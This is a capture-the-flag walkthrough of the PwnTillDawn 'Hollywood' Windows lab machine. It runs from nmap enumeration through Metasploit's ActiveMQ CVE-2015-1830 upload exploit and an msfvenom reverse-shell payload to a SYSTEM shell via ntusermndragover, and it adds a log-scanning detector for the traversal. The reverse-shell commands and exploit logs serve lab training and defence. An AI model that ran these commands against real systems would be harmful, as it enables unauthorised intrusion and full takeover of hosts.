PwnTillDawn - Hollywood


Hollywood from PwnTillDawn is running

Enumeration

nmap

We start an Nmap scan using the following command: sudo nmap -sC -sV -T4 {target_IP}.

  • -sC: run the default NSE scripts.

  • -sV: detect the version of each service found.

  • -T4: aggressive timing template for faster results.

Nmap scan report for 10.150.150.219      
Host is up (0.16s latency).              
Not shown: 976 closed tcp ports (reset)  
PORT      STATE SERVICE      VERSION     
21/tcp    open  ftp          FileZilla ftpd 0.9.41 beta             
| ftp-syst:           
|_  SYST: UNIX emulated by FileZilla     
25/tcp    open  smtp         Mercury/32 smtpd (Mail server account Maiser)         
|_smtp-commands: localhost Hello nmap.scanme.org; ESMTPs are:, TIME 
79/tcp    open  finger       Mercury/32 fingerd                     
| finger: Login: Admin         Name: Mail System Administrator\x0D  
| \x0D 
|_[No profile information]\x0D           
80/tcp    open  http         Apache httpd 2.4.34 ((Win32) OpenSSL/1.0.2o PHP/5.6.38)                  
|_http-server-header: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38              
| http-title: Welcome to XAMPP           
|_Requested resource was http://10.150.150.219/dashboard/           
106/tcp   open  pop3pw       Mercury/32 poppass service             
110/tcp   open  pop3         Mercury/32 pop3d                       
|_pop3-capabilities: UIDL USER TOP APOP EXPIRE(NEVER)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
143/tcp   open  imap         Mercury/32 imapd 4.62
|_imap-capabilities: complete CAPABILITY OK AUTH=PLAIN IMAP4rev1 X-MERCURY-1A0001
443/tcp   open  ssl/http     Apache httpd 2.4.34 ((Win32) OpenSSL/1.0.2o PHP/5.6.38)
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47          
|_Not valid after:  2019-11-08T23:48:47          
|_ssl-date: TLS randomness does not represent time
|_http-server-header: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
| tls-alpn:  
|_  http/1.1
| http-title: Welcome to XAMPP
|_Requested resource was https://10.150.150.219/dashboard/
445/tcp   open  microsoft-ds Windows 7 Ultimate 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
554/tcp   open  rtsp?
2869/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
3306/tcp  open  mysql        MariaDB (unauthorized)
8009/tcp  open  ajp13        Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8080/tcp  open  http         Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.56
8089/tcp  open  ssl/http     Splunkd httpd
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2019-10-28T09:17:32
|_Not valid after:  2022-10-27T09:17:32
| http-robots.txt: 1 disallowed entry 
|_/
|_http-server-header: Splunkd
|_http-title: splunkd
8161/tcp  open  http     syn-ack Jetty 8.1.16.v20140903
|_http-favicon: Unknown favicon MD5: 05664FB0C7AFCD6436179437E31F3AA6
|_http-title: Apache ActiveMQ
|_http-server-header: Jetty(8.1.16.v20140903)
| http-methods: 
|_  Supported Methods: GET HEAD
10243/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49152/tcp open  msrpc        Microsoft Windows RPC
49153/tcp open  unknown
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  unknown
49156/tcp open  unknown
49157/tcp open  msrpc        Microsoft Windows RPC
61613/tcp open  stomp    syn-ack Apache ActiveMQ 5.10.1 - 5.11.1
61614/tcp open  http     syn-ack Jetty 8.1.16.v20140903
Service Info: Hosts: localhost, HOLLYWOOD; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-04-22T10:35:24
|_  start_date: 2020-04-02T14:13:04
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required
|_clock-skew: mean: -2h18m10s, deviation: 4h37m03s, median: 21m46s
| smb-os-discovery: 
|   OS: Windows 7 Ultimate 7601 Service Pack 1 (Windows 7 Ultimate 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1
|   Computer name: Hollywood
|   NetBIOS computer name: HOLLYWOOD\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2025-04-22T18:35:26+08:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)

The target is a Windows box with multiple ports open. We have mail services (POP3, IMAP, SMTP), HTTP servers (Apache, IIS…) and the typical Windows services like SMB and MSRPC.

There is a lot to go through on this box, but I will go directly to how I gained a foothold.

Foothold

After checking all the services for default credentials and for outdated or vulnerable versions, we finally get a hit on port 61613:

61613/tcp open  stomp    syn-ack Apache ActiveMQ 5.10.1 - 5.11.1

This port is running ActiveMQ 5.10.1 - 5.11.1, and after some research on Google we find CVE-2015-1830:

Directory traversal vulnerability in the fileserver upload/download functionality for blob messages in Apache ActiveMQ 5.x before 5.11.2 for Windows allows remote attackers to create JSP files in arbitrary directories via unspecified vectors.

The exploit for this vulnerability can be found in Metasploit under the name exploit/multi/http/apache_activemq_upload_jsp.

[msf](Jobs:0 Agents:0) exploit(multi/http/apache_activemq_upload_jsp) >> set rhosts 10.150.150.219
rhosts => 10.150.150.219
[msf](Jobs:0 Agents:0) exploit(multi/http/apache_activemq_upload_jsp) >> set lhost tun0
lhost => 10.66.66.230
[msf](Jobs:0 Agents:0) exploit(multi/http/apache_activemq_upload_jsp) >> exploit
[*] Started reverse TCP handler on 10.66.66.230:4444 
[*] Uploading http://10.150.150.219:8161/C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin\../webapps/api//DhYnsDUvYhY.jar
[*] Uploading http://10.150.150.219:8161/C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin\../webapps/api//DhYnsDUvYhY.jsp
[*] Sending stage (58073 bytes) to 10.150.150.219
[+] Deleted C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin\../webapps/api//DhYnsDUvYhY.jsp
[*] Meterpreter session 1 opened (10.66.66.230:4444 -> 10.150.150.219:49316) at 2025-04-22 12:32:02 +0100
[!] This exploit may require manual cleanup of 'C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin\../webapps/api//DhYnsDUvYhY.jar' on the target

(Meterpreter 1)(C:\Users\User\Desktop\apache-activemq-5.11.1-bin\apache-activemq-5.11.1\bin) > getuid
Server username: User
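The traversal described above leaves a recognizable trace in the ActiveMQ web console's request log: a PUT or MOVE to /fileserver/ whose path climbs out with ../ or ..\ sequences, or that drops a .jsp or .jar into place. The following Python script is an added example, not part of the original write-up or of the Metasploit module; it scans constructed NCSA-style log lines for that pattern, and the log lines, file names and the /fileserver/ context path it assumes are made up or taken from ActiveMQ's default layout for the demonstration.

```python
import re
from urllib.parse import unquote

# Constructed NCSA-style request log lines, modelled on what the ActiveMQ web
# console (Jetty, port 8161) would record; none of them come from the target.
SAMPLE_LOG = [
    '10.66.66.230 - - [22/Apr/2025:12:31:58 +0100] "GET /admin/ HTTP/1.1" 200 1234',
    '10.66.66.230 - - [22/Apr/2025:12:31:59 +0100] "PUT /fileserver/..\\..\\webapps\\api\\x.jar HTTP/1.1" 204 0',
    '10.66.66.230 - - [22/Apr/2025:12:32:00 +0100] "PUT /fileserver/%2e%2e/%2e%2e/webapps/api/x.jsp HTTP/1.1" 204 0',
    '10.66.66.230 - - [22/Apr/2025:12:32:01 +0100] "PUT /fileserver/report.txt HTTP/1.1" 204 0',
    '10.66.66.230 - - [22/Apr/2025:12:32:02 +0100] "MOVE /fileserver/report.txt HTTP/1.1" 204 0',
]

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d"')
WRITE_METHODS = {"PUT", "MOVE"}          # methods the fileserver webapp accepts for writes
EXEC_EXTS = (".jsp", ".jspx", ".jar", ".war")


def normalize(path):
    """Decode percent-encoding twice (catches double encoding) and fold Windows
    backslashes into slashes, so '..\\' and '%2e%2e/' both become '../'."""
    return unquote(unquote(path)).replace("\\", "/").lower()


def check_line(line):
    """Return the names of the rules one log line triggers (empty if clean)."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    method, path = m.group("method"), normalize(m.group("path"))
    hits = []
    if method in WRITE_METHODS and path.startswith("/fileserver/"):
        if ".." in path.split("/"):                 # path climbs out of the fileserver root
            hits.append("fileserver-traversal")
        if path.endswith(EXEC_EXTS):                # server-side executable dropped via the fileserver
            hits.append("fileserver-executable-upload")
    return hits


def scan(lines):
    """Map 1-based line numbers to the rules they trigger; clean lines are omitted."""
    return {n: hits for n, line in enumerate(lines, 1) if (hits := check_line(line))}


if __name__ == "__main__":
    for lineno, rules in scan(SAMPLE_LOG).items():
        print(f"line {lineno}: {', '.join(rules)}")
```

A standard access log does not record the Destination header of a MOVE, so a traversal supplied there is invisible to this check; the real fix is upgrading to 5.11.2 or later, where the NVD entry says the issue is resolved.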

Privilege Escalation

Now let’s run the local exploit suggester module.

We background our session and select the module:

(Meterpreter 3)(C:\Users\User\Downloads) > background
[*] Backgrounding session 1...
[msf](Jobs:0 Agents:1) exploit(multi/http/apache_activemq_upload_jsp) >> use post/multi/recon/local_exploit_suggester

Now we set the session and run the module:

[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> set session 1  
session => 1          
[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> exploit        
[*] 10.150.150.219 - Collecting local exploits for java/windows...  
[*] 10.150.150.219 - 202 exploit checks are being tried...          
[+] 10.150.150.219 - exploit/windows/local/ikeext_service: The target appears to be vulnerable.       
[+] 10.150.150.219 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.             
[+] 10.150.150.219 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.                  
[+] 10.150.150.219 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.         
[*] Running check method for exploit 42 / 42                        
[*] 10.150.150.219 - Valid modules for session 1:                   
============================             

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/ikeext_service                           Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.
 3   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 4   exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.

We got four candidate exploits, but after trying them nothing worked.

Let’s try upgrading our Meterpreter shell from java/meterpreter/reverse_tcp to windows/meterpreter/reverse_tcp. The Java Meterpreter runs inside the JVM and reports its platform as java/windows, so the suggester could only match modules against that; a native Windows Meterpreter gives it an x86/windows session to check.

First we generate the payload using msfvenom:

 msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.66.66.230 LPORT=5555 -f exe -o rev.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: rev.exe

I’ll set up a multi/handler listener with the same options we used in the msfvenom command above and run it in the background with run -j.

[msf](Jobs:0 Agents:1) post(multi/recon/local_exploit_suggester) >> use multi/handler
[*] Using configured payload generic/shell_reverse_tcp         
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> set payload windows/meterpreter/reverse_tcp                 
payload => windows/meterpreter/reverse_tcp      
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> set lhost tun0
lhost => tun0        
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> set lport 5555
lport => 5555                                
[msf](Jobs:0 Agents:1) exploit(multi/handler) >> run -j        
[*] Exploit running as background job 0.        
[*] Exploit completed, but no session was created.             
[msf](Jobs:1 Agents:1) exploit(multi/handler) >>
[*] Started reverse TCP handler on 10.66.66.230:5555 

I’ll go back to the Meterpreter session with session 1 and upload the rev.exe file we created.

(Meterpreter 1)(C:\Users\User\Downloads) > upload rev.exe
[*] Uploading  : /home/sirius/ctf/ptd/hollywood/rev.exe -> rev.exe
[*] Uploaded -1.00 B of 72.07 KiB (-0.0%): /home/sirius/ctf/ptd/hollywood/rev.exe -> rev.exe
[*] Completed  : /home/sirius/ctf/ptd/hollywood/rev.exe -> rev.exe
(Meterpreter 1)(C:\Users\User\Downloads) >

Now I’ll drop to a normal shell and run the exe file.

C:\Users\User\Downloads>.\rev.exe
.\rev.exe

C:\Users\User\Downloads>
[*] Sending stage (177734 bytes) to 10.150.150.219
background[*] Meterpreter session 2 opened (10.66.66.230:5555 -> 10.150.150.219:49289) at 2025-04-26 11:17:11 +0100

We got the new Meterpreter session.

Let’s exit the current session, go back to the exploit suggester, set the new session and rerun it.

[msf](Jobs:0 Agents:2) post(multi/recon/local_exploit_suggester) >> exploit
[*] 10.150.150.219 - Collecting local exploits for x86/windows...
[*] 10.150.150.219 - 202 exploit checks are being tried...
[+] 10.150.150.219 - exploit/windows/local/bypassuac_comhijack: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.150.150.219 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms15_004_tswbproxy: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.150.150.219 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.150.150.219 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 42 / 42
[*] 10.150.150.219 - Valid modules for session 4:
============================

 #   Name                                                           Potentially Vulnerable?  Check Result
 -   ----                                                           -----------------------  ------------
 1   exploit/windows/local/bypassuac_comhijack                      Yes                      The target appears to be vulnerable.
 2   exploit/windows/local/bypassuac_eventvwr                       Yes                      The target appears to be vulnerable.
 3   exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move   Yes                      The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
 4   exploit/windows/local/ms10_015_kitrap0d                        Yes                      The service is running, but could not be validated.
 5   exploit/windows/local/ms10_092_schelevator                     Yes                      The service is running, but could not be validated.
 6   exploit/windows/local/ms14_058_track_popup_menu                Yes                      The target appears to be vulnerable.
 7   exploit/windows/local/ms15_004_tswbproxy                       Yes                      The service is running, but could not be validated.
 8   exploit/windows/local/ms15_051_client_copy_image               Yes                      The target appears to be vulnerable.
 9   exploit/windows/local/ms16_016_webdav                          Yes                      The service is running, but could not be validated.
 10  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  Yes                      The service is running, but could not be validated.
 11  exploit/windows/local/ntusermndragover                         Yes                      The target appears to be vulnerable.
 12  exploit/windows/local/tokenmagic                               Yes                      The target appears to be vulnerable.

We got more results this time!

Trying the new ones, exploit/windows/local/ntusermndragover gives us a SYSTEM shell.

[msf](Jobs:0 Agents:1) exploit(windows/local/ntusermndragover) >> run
[*] Started reverse TCP handler on 10.66.66.230:4443
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] Reflectively injecting the exploit DLL and running the exploit...
[*] Launching msiexec to host the DLL...
[+] Process 5552 launched.
[*] Reflectively injecting the DLL into 5552...               
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (177734 bytes) to 10.150.150.219
[*] Meterpreter session 5 opened (10.66.66.230:4443 -> 10.150.150.219:49292) at 2025-04-26 11:22:23 +0100

(Meterpreter 5)(C:\Users\User\Downloads) > getuid             
Server username: NT AUTHORITY\SYSTEM        

References

https://nvd.nist.gov/vuln/detail/cve-2015-1830


Thank you for taking the time to read my write-up, I hope you have learned something from this. If you have any questions or comments, please feel free to reach out to me. See you in the next hack :).

This post is licensed under CC BY 4.0 by the author.